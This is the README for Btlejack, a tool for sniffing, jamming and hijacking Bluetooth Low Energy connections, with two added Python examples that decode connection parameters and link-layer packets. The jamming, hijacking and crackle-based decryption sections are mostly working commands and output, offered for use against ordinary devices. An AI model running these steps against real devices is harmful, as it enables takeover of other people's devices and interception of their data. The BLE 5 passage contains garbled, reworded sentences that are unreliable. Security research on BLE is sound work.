Btlejack – Bluetooth Low Energy Swiss-army Knife

Btlejack provides everything you need to sniff, jam and hijack Bluetooth Low Energy devices. It relies on one or more BBC Micro:Bit devices running a dedicated firmware. You may also want to use an Adafruit Bluefruit LE sniffer or a nRF51822 Eval Kit, as we added support for these devices.
The current version of this tool (2.0) supports BLE 4.x and 5.x. The BLE 5.x support is limited, as it only supports the 1Mbps Uncoded PHY and does not support channel map updates.

Requirements
You need a UNIX based system (for example a Raspberry Pi). If you use the BBC Micro:Bit, you will need one to three Micro:Bit devices (three devices recommended) and one free USB port per device. The power consumption of a Micro:Bit is rather low, so you can use a single USB port and a passive hub to power the three recommended units.
If you connect 3 Micro:Bits at the same time to your computer, Btlejack will be able to sniff on every advertising channel and has far more chance to capture the connection request.


How to install
First, install the btlejack Python3 client software with Pip:

$ sudo pip3 install btlejack

Then, connect your Micro:Bit device to your computer with a USB cable, mount the associated mass storage device (the mount point must contain MICROBIT), and issue the following command:

$ btlejack -i

This will program every Micro:Bit device connected to your computer, and make them ready to use with Btlejack. It will use the correct firmware version for the current client software, so it is strongly recommended to perform this firmware installation procedure every time you update Btlejack.
If you are using a Bluefruit LE sniffer or a nRF51822 Eval Kit, then please use an external SWD programmer to flash your device with this firmware.
Keep your devices connected and you're all set!
NOTE This only works with POSIX compatible systems.


How to use Btlejack
Using Btlejack is quite easy. Btlejack can:

  • use various devices
  • sniff an existing BLE connection
  • sniff new BLE connections
  • jam an existing BLE connection
  • hijack an existing BLE connection
  • export captured packets to various PCAP formats


Specify devices to use
Btlejack normally tries to autodetect and use connected compatible devices (Micro:Bit only for the moment), but since the firmware can be hacked or modified to work with other nRF51822-based boards, it provides specific options to allow compatibility with these devices.
The -d option lets you specify one or more devices to use with Btlejack. Note that this option disables the automatic detection of devices, so you must add as many devices as you need:

$ btlejack -d /dev/ttyACM0 -d /dev/ttyACM2 -s



Sniffing an existing connection
First, find an existing connection to target with btlejack:

$ btlejack -s
BtleJack version 1.1

[i] Enumerating existing connections ...
[ - 54 dBm] 0xcd91d517 | pkts: 1
[ - 46 dBm] 0xcd91d517 | pkts: 2

The first value (in dBm) shows the power of the signal; the greater this value is, the better the sniffed connection will be.
The second value (hex) is the associated access address, a 32-bit value identifying a link between two Bluetooth Low Energy compatible devices.
The last value is the number of packets seen with this access address. The higher this value is, the more probable it is that the corresponding access address is actually in use.
Then, use the -f option to follow a specific connection:

$ btlejack -f 0xdda4845e
BtleJack version 1.1

[i] Detected sniffers:
> Sniffer #0: fw version 1.1

[i] Synchronizing with connection 0xdda4845e ...
✓ CRCInit: 0x2a035e
✓ Channel Map = 0x1fffffffff
✓ Hop interval = 39
✓ Hop increment = 15
[i] Synchronized, packet capture in progress ...
LL Data: 02 07 03 00 04 00 0a 03 00
LL Data: 0a 08 04 00 04 00 0b 5a 69 70
LL Data: 02 07 03 00 04 00 0a 03 00
LL Data: 0a 08 04 00 04 00 0b 5a 69 70


If you are using more than one Micro:Bit, Btlejack will parallelize some of the sniffing operations in order to speed up the recovery of the connection parameters!

Sniffing for new connections
The -c option supported by btlejack allows you to specify the target BD address, or you may want to use any to capture any new connection created.

$ btlejack -c any
BtleJack version 1.1

[i] Detected sniffers:
> Sniffer #0: version 1.1
> Sniffer #1: version 1.1
LL Data: 05 22 df b4 6f 95 c5 55 c0 0a f6 99 23 40 1d 7b 2f 0a 9a f4 93 01 12 00 27 00 00 00 d0 07 ff ff ff ff 1f 0b
[i] Got CONNECT_REQ packet from 55:c5:95:6f:b4:df to 40:23:99:f6:0a:c0
|-- Access Address: 0x0a2f7b1d
|-- CRC Init value: 0x93f49a
|-- Hop interval: 39
|-- Hop increment: 11
|-- Channel Map: 1fffffffff
|-- Timeout: 20000 ms

LL Data: 03 09 08 0f 00 00 00 00 00 00 00
LL Data: 03 09 08 0f 00 00 00 00 00 00 00
LL Data: 0b 06 0c 08 0f 00 09 41
LL Data: 03 06 0c 07 1d 00 d3 07

or you may also want to specify the target BD address:

$ btlejack -c 03:e1:f0:00:11:22
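As an added worked example (this is not Btlejack code and not part of its README), the Python below parses the CONNECT_REQ PDU printed in the `-c any` capture above into the same fields Btlejack lists, then derives the CSA #1 data-channel sequence from the recovered channel map and hop increment. This is the relation between the parameters recovered in the `-f` output above (CRCInit, channel map, hop interval, hop increment) and the ability to follow a BLE 4.x connection: once they are known, every future data channel is predictable. The PDU bytes are copied from the capture above; the reduced channel map used in `main()` is constructed here to show the remapping step, and `csa1_channels` is this example's own implementation of the spec algorithm, not Btlejack's.

```python
# Added example, not part of Btlejack: parse a CONNECT_REQ PDU and derive the
# CSA #1 data-channel sequence (Bluetooth Core, Vol 6, Part B, 2.3.3.1 and 4.5.8.2).
import struct

# "LL Data:" line exactly as printed in the `btlejack -c any` capture above.
CONNECT_REQ_HEX = (
    "05 22 df b4 6f 95 c5 55 c0 0a f6 99 23 40 1d 7b 2f 0a 9a f4 93 "
    "01 12 00 27 00 00 00 d0 07 ff ff ff ff 1f 0b"
)


def bdaddr(raw):
    """Six address bytes as sent on the air (LSB first) -> printable BD address."""
    return ":".join("%02x" % b for b in reversed(raw))


def parse_connect_req(hexstr):
    """Split a CONNECT_REQ PDU into InitA, AdvA and the 22-byte LLData block."""
    pdu = bytes.fromhex(hexstr.replace(" ", ""))
    pdu_type, length = pdu[0] & 0x0F, pdu[1]
    if pdu_type != 0x05 or length != 34 or len(pdu) != 2 + length:
        raise ValueError("not a well-formed CONNECT_REQ PDU")
    init_a, adv_a, lldata = pdu[2:8], pdu[8:14], pdu[14:36]
    (aa, crc_init_raw, win_size, win_offset, interval, latency, timeout,
     chm_raw, hop_sca) = struct.unpack("<I3sBHHHH5sB", lldata)
    return {
        "init_addr": bdaddr(init_a),
        "adv_addr": bdaddr(adv_a),
        "access_address": aa,
        "crc_init": int.from_bytes(crc_init_raw, "little"),
        "win_size": win_size,                    # units of 1.25 ms
        "win_offset": win_offset,                # units of 1.25 ms
        "hop_interval": interval,                # units of 1.25 ms (39 -> 48.75 ms)
        "hop_interval_ms": interval * 1.25,
        "latency": latency,                      # events the slave may skip
        "timeout_ms": timeout * 10,              # supervision timeout, units of 10 ms
        "channel_map": int.from_bytes(chm_raw, "little"),  # bit n set = channel n used
        "hop_increment": hop_sca & 0x1F,         # low 5 bits; spec range is 5..16
        "sca": hop_sca >> 5,                     # master sleep clock accuracy code
    }


def csa1_channels(channel_map, hop_increment, count):
    """First `count` data channels selected by Channel Selection Algorithm #1."""
    used = [ch for ch in range(37) if (channel_map >> ch) & 1]
    if not used or not 5 <= hop_increment <= 16:
        raise ValueError("invalid channel map or hop increment")
    channels, unmapped = [], 0          # lastUnmappedChannel starts at 0
    for _ in range(count):
        unmapped = (unmapped + hop_increment) % 37
        if (channel_map >> unmapped) & 1:
            channels.append(unmapped)   # channel is in the map: use it directly
        else:
            # remapping: index into the list of used channels
            channels.append(used[unmapped % len(used)])
    return channels


def main():
    params = parse_connect_req(CONNECT_REQ_HEX)
    for key, value in params.items():
        print("%-16s %s" % (key, hex(value) if isinstance(value, int) else value))
    print("first channels, full map :",
          csa1_channels(params["channel_map"], params["hop_increment"], 8))
    # Constructed map with channels 0..9 removed, to show the remapping branch.
    print("first channels, 0..9 off :",
          csa1_channels(0x1FFFFFFC00, params["hop_increment"], 8))


if __name__ == "__main__":
    main()
```

With the full channel map the sequence is simply successive multiples of the hop increment modulo 37, which is why the hop increment alone (recovered from the inter-packet timing in the `-f` run) is enough to resynchronize; with a partial map, the remapping step makes the used-channel list part of what must be recovered too.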



Jamming a connection
Once a connection is identified by its access address, you can jam it by using the -j option:

$ btlejack -f 0x129f3244 -j



Hijacking a BLE connection
Btlejack is also able to hijack an existing connection; use the -t option to do so. Once hijacked, Btlejack gives you a prompt allowing you to interact with the hijacked device.
First, hijack an existing connection:

$ btlejack -f 0x9c68fd30 -t -m 0x1fffffffff
BtleJack version 1.1

[i] Using cached parameters (created on 2019-08-11 01:48:24)
[i] Detected sniffers:
> Sniffer #0: fw version 1.1

[i] Synchronizing with connection 0x9c68fd30 ...
✓ CRCInit: 0x81f733
✓ Channel map is provided: 0x1fffffffff
✓ Hop interval = 39
✓ Hop increment = 9
[i] Synchronized, hijacking in progress ...
[i] Connection successfully hijacked, it is all yours o/
btlejack>

Then use the following commands to interact with the device:

  • discover: performs services and characteristics enumeration, gives you all the information about services and characteristics
  • write: write data to a specific value handle
  • read: read data from a specific value handle
  • ll: sends a raw link-layer packet (for ninjas)


discover command
The discover command will send and receive Bluetooth LE packets and retrieve all the service UUIDs and parameters, as well as the characteristic UUIDs and parameters:

btlejack> discover
start: 0001 end: 0005
start: 0014 end: 001a
start: 0028 end: ffff
Discovered services:
Service UUID: 1801
Characteristic UUID: 2a05
| handle: 0002
| properties: indicate (20)
value handle: 0003

Service UUID: 1800
Characteristic UUID: 2a04
| handle: 0019
| properties: read (02)
value handle: 001a

Characteristic UUID: 2a00
| handle: 0015
| properties: read (02)
value handle: 0016

Characteristic UUID: 2a01
| handle: 0017
| properties: read (02)
value handle: 0018

Service UUID: 1824
Characteristic UUID: 2abc
| handle: 0029
| properties: write indicate (28)
value handle: 002a



read command
The read command accepts a single parameter, the value handle corresponding to the characteristic you want to read from:

btlejack> read 0x16
read>> 4c 47 20 77 65 62 4f 53 20 54 56


write command
The write command accepts three parameters:

btlejack> write <value handle> <data format> <data>

Supported data formats:

  • hex: hex data (i.e. "414261")
  • str: text string, may be encapsulated in double quotes



ll command
This last command allows you to send Bluetooth Low Energy Link-layer PDUs, in hex form, as specified in Volume 6, Part B, Chapter 2.4.
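To make the hex form concrete, here is an added example (not Btlejack code) that decodes the "LL Data:" PDUs shown in the captures above, both the ATT read request/response pair and the LL control PDUs, and builds the data PDU that carries an ATT Read Request for value handle 0x16, i.e. what the `read 0x16` command above asks the device for. The SN/NESN header bits depend on link state, so building them as 0/0 is an assumption: Btlejack's own `read` command tracks them itself, and whether `ll` expects you to set them is not stated on this page.

```python
# Added example, not part of Btlejack: decode/encode BLE data channel PDUs
# (Vol 6, Part B, 2.4: 2-byte header, then payload).
import struct

ATT_CID = 0x0004
LL_CTRL_NAMES = {0x08: "LL_FEATURE_REQ", 0x09: "LL_FEATURE_RSP", 0x0c: "LL_VERSION_IND"}
ATT_NAMES = {0x0a: "ATT_READ_REQ", 0x0b: "ATT_READ_RSP",
             0x12: "ATT_WRITE_REQ", 0x13: "ATT_WRITE_RSP"}


def decode_ll_data(hexstr):
    """Decode one data PDU as printed by Btlejack ("02 07 03 00 04 00 0a 03 00")."""
    pdu = bytes.fromhex(hexstr.replace(" ", ""))
    hdr, length, payload = pdu[0], pdu[1], pdu[2:]
    if len(payload) != length:
        raise ValueError("length field %d != %d payload bytes" % (length, len(payload)))
    info = {
        "llid": hdr & 0x03,        # 1: L2CAP continuation, 2: L2CAP start/complete, 3: LL control
        "nesn": (hdr >> 2) & 1,    # next expected sequence number
        "sn": (hdr >> 3) & 1,      # sequence number
        "md": (hdr >> 4) & 1,      # more data
    }
    if info["llid"] == 3:
        opcode = payload[0]
        info["kind"] = LL_CTRL_NAMES.get(opcode, "LL_CTRL_0x%02x" % opcode)
        if opcode == 0x0c:  # LL_VERSION_IND: VersNr, CompId, SubVersNr
            versnr, compid, subversnr = struct.unpack("<BHH", payload[1:6])
            info.update(versnr=versnr, compid=compid, subversnr=subversnr)
        elif opcode in (0x08, 0x09):  # LL_FEATURE_REQ/RSP: 8-byte feature set
            info["features"] = int.from_bytes(payload[1:9], "little")
    elif info["llid"] == 2:
        l2cap_len, cid = struct.unpack("<HH", payload[:4])
        att = payload[4:4 + l2cap_len]
        info["cid"] = cid
        if cid == ATT_CID and att:
            opcode = att[0]
            info["kind"] = ATT_NAMES.get(opcode, "ATT_0x%02x" % opcode)
            if opcode in (0x0a, 0x12):   # Read Request / Write Request: handle [+ value]
                info["handle"] = struct.unpack("<H", att[1:3])[0]
                info["value"] = att[3:]
            elif opcode == 0x0b:          # Read Response: value only
                info["value"] = att[1:]
    return info


def att_read_req(handle, sn=0, nesn=0):
    """LL data PDU carrying an ATT Read Request for `handle`, as a hex string.
    sn/nesn are link state; 0/0 is an assumption for illustration only."""
    att = struct.pack("<BH", 0x0a, handle)                  # opcode, handle
    l2cap = struct.pack("<HH", len(att), ATT_CID) + att     # L2CAP length, CID, payload
    hdr = 0x02 | (nesn << 2) | (sn << 3)                    # LLID 2 = start/complete
    pdu = bytes([hdr, len(l2cap)]) + l2cap
    return " ".join("%02x" % b for b in pdu)


def main():
    # Lines copied from the captures above.
    for line in ("02 07 03 00 04 00 0a 03 00",
                 "0a 08 04 00 04 00 0b 5a 69 70",
                 "03 09 08 0f 00 00 00 00 00 00 00",
                 "03 06 0c 07 1d 00 d3 07"):
        print(line, "->", decode_ll_data(line))
    print("read 0x16 ->", att_read_req(0x16))
    # Value returned by `read 0x16` above, decoded as text.
    print(bytes.fromhex("4c47207765624f5320545".ljust(22, "6")).decode("ascii"))


if __name__ == "__main__":
    main()
```

Decoding the captured pairs shows why the `-f` example above loops: each "02 07 ..." line is a Read Request for handle 0x0003 and each "0a 08 ..." line the Read Response carrying "Zip". The two "03 06 0c ..." lines in the `-c any` capture are LL_VERSION_IND exchanged by both ends, and "03 09 08 ..." is an LL_FEATURE_REQ, all of which go through the `ll` command in exactly this hex form.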


PCAP file export
One interesting feature of Btlejack is the possibility to export the captured data to a PCAP file.
Btlejack supports the following DLT formats:

  • DLT_BLUETOOTH_LE_LL_WITH_PHDR (same)
  • DLT_NORDIC_BLE (the one used by Nordic's sniffer)
  • DLT_BLUETOOTH_LE_LL (supported on the latest versions of Wireshark)

The output file may be specified using the -o option, while the output format may be specified with the -x option. Valid format values are: ll_phdr, nordic, or pcap (default).

$ btlejack -f 0xac56bc12 -x nordic -o capture.nordic.pcap

The ll_phdr export type is useful when sniffing an encrypted connection, as it is also supported by crackle. So if you want to sniff and break encrypted connections, this is the way to go.
You may also want to tell crackle to use a specific cracking strategy, by using the -s option:

$ crackle -i some.pcap -s 1



Connection cache
Btlejack uses a connection cache to store some connection-related values in order to speed things up a bit. This connection cache may cause some problems, especially if an access address has been previously seen and its cached parameters no longer match the live connection.
This cache can be flushed with the -z option:

$ btlejack -z



Dumping live packets with Wireshark
Btlejack 2.0 introduces a new -w option that lets you specify a FIFO path (existing or not) in order to perform live packet analysis:

$ btlejack -c any -w /tmp/blepipe

You can even use a FIFO and an output file at the same time:

$ btlejack -c any -w /tmp/blepipe -o blepackets.pcap



Hint for using btlejack on a Raspberry Pi
If you have previously enabled virtual ethernet over USB (RNDIS), e.g. to set up a Raspberry Pi Zero W over USB, you need to disable this again (i.e. remove dtoverlay=dwc2 from boot/config.txt and modules-load=dwc2,g_ether from boot/cmdline.txt, then sudo reboot), because it will otherwise interfere with the sniffers' USB connections.


Bluetooth LE 5 & 5.1 support
This version supports Bluetooth Low Energy versions 5 and 5.1 and especially the new channel selection algorithm introduced in version 5 (CSA #2). However, since the hardware used does not support the 2 new PHYs added in version 5, it will only be able to sniff, jam, and maybe hijack connections using the 1Mbps uncoded PHY.
Please also note that the current implementation of CSA #2 included in Btlejack does not support channel map updates, for the moment.


Sniffing a brand new BLE 5 connection
Btlejack mechanically detects the channel variety set of rules used, so that you do not need to fret and simply seize packets as same old.


Sniffing an existing BLE 5 connection
Sniffing an existing BLE 5 connection (that uses the 1Mbps uncoded PHY, and only this PHY) is not so difficult. First, you must specify that you want to target a BLE 5 connection, by using the -5 option. Please note that there is no way to tell whether an existing connection uses CSA #2 or CSA #1, so you have to try both methods until one works.

$ btlejack -f 0x11223344 -5

Btlejack will then recover the channel map used and then the hop interval value:

$ btlejack -f 0x11223344 -5
[i] Synchronizing with connection 0x11223344 ...
✓ CRCInit: 0x40d64f
✓ Channel Map = 0x1fffffffff
✓ Hop interval = 160

It will then try to recover this connection's PRNG counter value:

$ btlejack -f 0x11223344 -5
[i] Synchronizing with connection 0x11223344 ...
✓ CRCInit: 0x40d64f
✓ Channel Map = 0x1fffffffff
✓ Hop interval = 160
✓ CSA2 PRNG counter = 5137
[i] Synchronized, packet capture in progress ...

Once done, Btlejack is synchronized with this connection and will process packets as usual.


Jamming an existing BLE 5 connection
Nothing new here, except that you must specify that you are attacking a BLE 5 connection, by using the -5 option.
Please note that you can optimize this attack by also specifying the channel map and hop interval value to use, with the -m and -p flags respectively. Both of them MUST be provided, otherwise it will not work.


Hijacking an existing BLE 5 connection
I did not manage to hijack a BLE 5 connection at the moment, as this attack is time-sensitive. My BLE 5 devices use a latency of 0, thus allowing no delay and causing this attack to fail.
When I get my hands on some legit BLE 5 devices, I will improve this.
